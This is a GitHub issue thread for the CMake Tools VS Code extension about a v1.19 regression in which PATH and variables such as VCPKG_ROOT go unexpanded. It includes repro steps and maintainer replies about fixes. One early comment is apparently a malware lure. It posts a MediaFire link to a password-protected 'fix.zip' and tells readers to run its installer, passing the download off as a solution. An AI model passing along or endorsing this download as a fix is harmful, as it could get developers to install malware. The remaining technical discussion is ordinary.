### ISSUE TITLE
PATH issue since v1.19

### ISSUE THREAD

**Issue by KorkiFork** [microsoft/vscode-cmake-tools#4019] opened 2024-08-29 07:03 UTC
### Brief Issue Summary

Hi!

Since CMake Tools version v1.19, the kits in the cmkae-tools-kits.json no longer read the system/user environment PATH correctly on Windows.
E.g. download Qt jom and add the jom.exe location to the system/user environment PATH.
Set a kit's preferredGenerator to "NMake Makefiles JOM", and when selecting the kit in a project configuration, the extension won't be able to find jom.exe.
Even adding path jom.exe via kit's environmentVariables won't help, e.g. environmentVariables{"PATH": "path_to_jom;${env.PATH}"}

**Comment by kehkou** [comment] 2024-08-29 07:03
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by kimbirkelund** [comment] 2024-08-29 07:38
I think I'm experiencing this too, but when setting the toolchain file - env var `VCPKG_ROOT` gets expanded to the empty string. 

However it is expanded correctly inside my _CMakeLists.txt_ file - `message("VCPKG_ROOT: $ENV{VCPKG_ROOT}")` prints expected value.

**Comment by PatrickKa** [comment] 2024-08-29 08:50
I experienced the same problem with `VCPKG_ROOT` being expanded to the empty string when using v1.19 of this extension. Calling CMake from the command line still worked as expected. I tried some other environment variables, and they all got expanded to the empty string, so it seems like this is a general problem with v1.19.

**Comment by danny-mhlv** [comment] 2024-08-29 10:20
Same here, `VCPKG_ROOT` environment variable is not being expanded.
```json
"CMAKE_TOOLCHAIN_FILE": {
    "type": "FILEPATH",
    "value": "$env{VCPKG_ROOT}/scripts/buildsystems/vcpkg.cmake"
},
```
CMake's output:
```cmake
-DCMAKE_TOOLCHAIN_FILE:FILEPATH=/scripts/buildsystems/vcpkg.cmake
```

**Comment by marcogmaia** [comment] 2024-08-29 11:21
Same here with 

```json
      "toolchainFile": "$env{VCPKG_ROOT}/scripts/buildsystems/vcpkg.cmake"
```

In the `CMakePresets.json`

**Comment by gcampbell-msft** [comment] 2024-08-29 12:35
@Skyblade14 @marcogmaia @KorkiFork @danny-mhlv @PatrickKa @kimbirkelund Thank you all for quickly posting an issue! We just released the official 1.19 version yesterday, so it sounds like there may be a regression. 

However, we can't necessarily properly investigate this without reproduction steps and repro projects. Could you all please provide these so that we can quickly investigate a fix?

**Comment by PatrickKa** [comment] 2024-08-29 13:07
It works 🎉. Environment variables in presets are now expanded correctly again. Thanks for the fast fix.

**Comment by gcampbell-msft** [comment] 2024-08-29 13:16
Perfect, we will work to get a PR merged today and then a fix into pre-release as soon as possible.

**Comment by gcampbell-msft** [comment] 2024-08-29 14:28
@KorkiFork I'm currently not able to reproduce the issue in the kits environment. I think the issue actually is related to this one #4020, not an issue with the environment. I'll track this in the other issue.

**Comment by gcampbell-msft** [comment] 2024-08-29 15:54
@Skyblade14 @marcogmaia @KorkiFork @danny-mhlv @PatrickKa @kimbirkelund We have a PR open here #4024, once merged, it will go into pre-release the next morning. 

@KorkiFork Please let me know if this fixes your issue, but since it's with kits, it may not. Please provide any more information about the error, the repro, etc, in order to help us reproduce your issue. 

Thanks!

**Comment by danny-mhlv** [comment] 2024-08-29 16:14
@gcampbell-msft huge thanks for your replies and work!

**Closed** 2024-08-29 16:27 UTC
Labels: bug, more info needed, regression

**Comment by KorkiFork** [comment] 2024-08-29 20:11
> @Skyblade14 @marcogmaia @KorkiFork @danny-mhlv @PatrickKa @kimbirkelund We have a PR open here #4024, once merged, it will go into pre-release the next morning.
> 
> @KorkiFork Please let me know if this fixes your issue, but since it's with kits, it may not. Please provide any more information about the error, the repro, etc, in order to help us reproduce your issue.
> 
> Thanks!

Sorry for the late reply, but I had a busy day.
I tried the patch you provided (zip->vsx file you attached) and my issue still prevails.

**Comment by KorkiFork** [comment] 2024-08-29 20:23
Reproduce issue like this:
Install jom (https://wiki.qt.io/Jom).
Add jom.exe location to your system PATH.
In cmake-tools-kits.json add the following kit:
`  {"name": "JOM test kit", "preferredGenerator": {"name": "NMake Makefiles JOM"}}`

Open a CMake project a try to configure it with the "JOM test kit".
You will get the error:

> [main] Unable to determine what CMake generator to use. Please install or configure a preferred generator, or update settings.json, your Kit configuration or PATH variable. Error: No usable generator found.

**Comment by gcampbell-msft** [comment] 2024-08-29 20:27
@KorkiFork Got it. I'll get to this issue and try to repro it as soon as possible.

**Comment by gcampbell-msft** [comment] 2024-08-30 10:04
@KorkiFork To workaround this, can you set the `cmake.generator` in your workspace to the desired generator?

**Comment by KorkiFork** [comment] 2024-08-30 11:18
> @KorkiFork To workaround this, can you set the `cmake.generator` in your workspace to the desired generator?

Tested with v1.20.1 (pre-release), the issue is still present.

**Comment by marcogmaia** [comment] 2024-08-30 12:05
Can confirm the same results as @KorkiFork, I've tested with the `v1.20.1` and the extension isn't honoring the VS devenv.

**Comment by gcampbell-msft** [comment] 2024-08-30 12:38
@marcogmaia What is your scenario? I can't repro or investigate your issues without reproduction steps and more info. THanks

**Comment by marcogmaia** [comment] 2024-08-30 13:08
@gcampbell-msft I've described what's happening with me in #4031.

**Comment by vipcxj** [comment] 2024-12-25 09:41
It seems that the bug comes back, #4218
I was using the latest cmake tool which is 1.19.52

**Comment by gcampbell-msft** [comment] 2025-01-06 15:12
@vipcxj Does this issue reproduce on the most recent pre-release version?

**Comment by KorkiFork** [comment] 2025-01-28 14:36
On version 1.20.42 the issue seems to be resolved by the CMake Extension in VS Code.
I see that you provide the variables set in a kit's cmakeSettings as command line arguments to CMake.
But CMake doesn't seem to handle the provided variables correctly. E.g. if in cmakeSettings the environment variable PATH is extended with an additional directory, this updated PATH value will be provided to CMake via the command line, but CMake ignores it and uses the original system PATH value.

But I guess this is our of scope for this conversation and should be reported to the CMake project, if it is considered to be a bug.
